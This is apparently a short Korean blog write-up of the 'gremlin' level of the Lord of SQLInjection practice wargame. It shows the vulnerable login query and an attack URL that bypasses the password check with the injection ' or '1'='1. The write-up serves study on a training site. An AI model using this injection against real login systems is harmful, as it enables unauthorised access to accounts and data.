Study/CTF

Lord of SQLInjection: gremlin

Clotilde 2025. 1. 21. 13:36

Problem

Solve

  • 기존 구문 → GET 방식
select id from prob_gremlin where id='{$_GET[id]}' and pw='{$_GET[pw]}’

 

  • 변경 구문
select id from prob_gremlin where id='admin' and pw='admin' or '1'='1#’

 

  • 공격 구문
https://los.rubiya.kr/chall/gremlin_280c5552de8b681110e9287421b834fd.php?id=admin&pw=admin' or '1'='1

 

저작자표시 비영리 변경금지 (새창열림)